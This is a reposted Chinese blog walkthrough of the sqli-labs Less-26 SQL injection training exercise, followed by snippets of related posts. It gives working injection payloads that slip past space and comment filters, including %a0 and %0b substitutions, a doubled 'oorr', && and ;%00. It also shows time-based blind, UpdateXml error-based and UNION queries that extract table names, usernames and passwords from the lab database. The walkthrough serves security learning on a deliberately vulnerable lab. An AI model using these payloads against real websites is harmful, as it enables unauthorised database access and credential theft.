【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)...

最新推荐文章于 2023-10-21 16:00:40 发布
最新推荐文章于 2023-10-21 16:00:40 发布
阅读量296 收藏 1
点赞数
原文链接:http://www.cnblogs.com/omnis/p/8367365.html
版权

看了下源码

所有的注释形式和反斜线,and,or都被了过滤掉了

单引号没有过滤

空格也被过滤了

http://localhost/sqli-labs-master/Less-26/?id=1'

http://localhost/sqli-labs-master/Less-26/?id=1' '

看了网上的一些方法都是使用了%a0替换掉了空格

http://localhost/sqli-labs-master/Less-26/?id=1'%a0oorr%a0'1'='1

但是出了一点问题,似乎无法识别%a0这个字符,有人说是window环境下apache的问题

可以先放着,因为这个语句是可以正常被执行的

http://localhost/sqli-labs-master/Less-26/?id=1'oorr'1'='1
SELECT * FROM users WHERE id='1'or'1'='1' LIMIT 0,1

利用这一点,可以构造这样的注入

id参数的值不包含注释不包含空格,却可以在正常执行,当user()的第一个字符为'r'的时候,延时1s

http://localhost/sqli-labs-master/Less-26/?id=1'%26%26sleep(ascii(mid(user(),1,1))=114)%26%26'1'='1
select * from users where id='1'&&sleep(ascii(mid(user(),1,1))=114)&&'1'='1' limit 0,1

当然出错信息没有被屏蔽也可以用UpdateXml函数直接报错来显示

http://localhost/sqli-labs-master/Less-26/?id=1'%26%26UpdateXml(1,concat(0x7e,user(),0x7e),1)%26%26'1'='1

 换到LAMP环境下再试一下

使用%a0代替空格

http://192.168.136.128/sqli-labs-master/Less-26/?id=0'%a0union%a0select%a01,2,'3

payload

http://192.168.136.128/sqli-labs-master/Less-26/?id=0'%a0union%a0select%a01,2,table_name%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security

取数据

http://192.168.136.128/sqli-labs-master/Less-26/?id=0'%a0union%a0select%a01,username,passwoorrd%a0from%a0users%a0limit%a01,1%a0union%a0select%a01,2,'3

 

转载于:https://www.cnblogs.com/omnis/p/8367365.html

ajxi63204
关注
sqli-labs ----less-26---37--练习
代码审计
03-07 997
sqli-labs————Less-26(绕空格、/*、#等) 该关卡提示空格注释被转义,我们测试一下: http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错, 我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm
sqli-labs less 26 GET -Error based -All your SPACES and COMMENTS belong to us
Monster1m的博客
02-25 199
一、也是属于他,看看源码这次是什么属于他。从源码看除了过滤了or、and、注释符等,还过滤了空格。网上好多人说因为apache解析的问题,windows下会有无法用特殊字符替换空格的问题,但是我在linux下试了也是有解析不了的问题,不知是我操作不对还是什么。但是!!!windows下也是可以完成这关的,不用费劲再跑去用linux 二、网上有好多空格的替代方法,比如以下几个,还有些双空格啊什么的,然后我自己试的话只有%0b和双空格会成功,所以大家可以多试几个替换方法 %09 TAB 键(水平) %0a 新
sqli-labs】 less26a GET- Blind based -All you SPACES and COMMENTS belong to us -String-single quotes...
ajxi63204的博客
01-28 199
这个和less26差不多,空格还是用%a0代替,26过了这个也就简单了 ;%00 可以代替注释,尝试一下 order by 3 http://192.168.136.128/sqli-labs-master/Less-26a/?id=1')%a0oorrder%a0by%a03;%00 order by 4 http://192.168.136.128/s...
26-a GET -Blind based -all your spaces and comments belong to us -string -sinle quotes-parenthesis
Monster1m的博客
03-10 227
一、这一关过滤的是空格注释符、and和or,源码如下 二、闭合符号是(’,源码如下 三、注释符被过滤,所以用;%00代替 ?id=2');%00 四、判断显示位,过滤了空格,所以用%0b代替。union之前的id置假不能用-1,因为-符号被过滤,所以选择用一个比较大的数来使前面的查询为假 ?id=100')%0Bunion%0Bselect%0B1,2,3;%00 五、判断数据库。这里的information里存在or,但or是被过滤的,所以用双写绕过 ?id=100')%0Bunion%0B
Less-26
老司机开代码的博客
08-04 758
文章目录1. 题目分析2. 思路分析2.1 不用空格2.1.1 报错注入2.1.2 盲注2.2 使用特殊字符代替空格 1. 题目分析 这道题的坑算是比较多的了,我们来分析一下。 通过初步测试发现这个题目过滤的东西有点多,直接看源码 function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id);
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs靶场练习笔记
最新发布
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
SQL注入分析-less-26
qq_33505576的博客
02-15 1293
SQL注入分析-less-26 近期在学习SQL注入的知识,在此呢,写篇博客记录一下手工注入的过程,中间走的弯路呢就不多提了,主要把自己成功注入的过程和结果在此做一个记录,不喜勿喷哈! 1、按照提示,在地址栏输入参数 http://192.168.88.129/sqli-labs-master/Less-26/?id=1 结果如下,正常回显: 使用单引号看看页面会报什么信息: http://192.168.88.129/sqli-labs-master/Less-26/?id=1’ 从这里判断
Sqli-labs less 26
weixin_34388207的博客
08-11 222
Less-26 TIPS:本关可能有的朋友在windows下无法使用一些特殊的字符代替空格,此处是因为apache的解析的问题,这里请更换到linux平台下。 本关结合25关,将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ' ;对于空格,有较多的...
Sqli-labs之Less-26和Less-26a
m0_46315342的博客
06-04 2184
                                          &nbs...
[网络安全]sqli-labs Less-26 解题详析
等风来
10-21 2130
以上为[网络安全]sqli-labs Less-26 解题详析,我是秋说,我们下次见。
sqli-less-26-less26a
沐目的博客
04-18 1064
less-26 单引号 GET 这关就有点过滤的意思了,过滤了上一关的东西,并且把空格和%23给过滤了。如果是ubuntu的话,可以用/**/,%0a等绕过,方便一些。但我的是windows,所以就只能用()了。让后使用||来代替and,用‘1来闭合。 数据库: -1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1 表: 1’|...
SQLMAP脚本-sql-labs-Less-26-27a
m0_69844818的博客
09-19 1740
sqlmap脚本跑sqli-labs
SQLi-LABS Less-26&&Less-26a
m0_64898960的博客
04-27 2238
Less-26题目 测试出需要“ ’ ”进行闭合 经过一番尝试,发现or和and继续坐在ban位上,然后空格和一些符号如“+”也坐上了ban位… 可以利用报错函数,便可以不用理会空格的威胁… 查表 Less-26a Less-26a需要使用“ ') ”进行闭合 继续尝试报错注入,发现报错注入已经没有我们想要的东西回显了… 只好根据题目,进行bool盲注即可 Less-26a总结 判断是否存在小括号 一开始怎么尝试都没有答案出来,后来百度原来还有个小括号,然后学习了一下如何判断是否还有小括号…真是裂
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值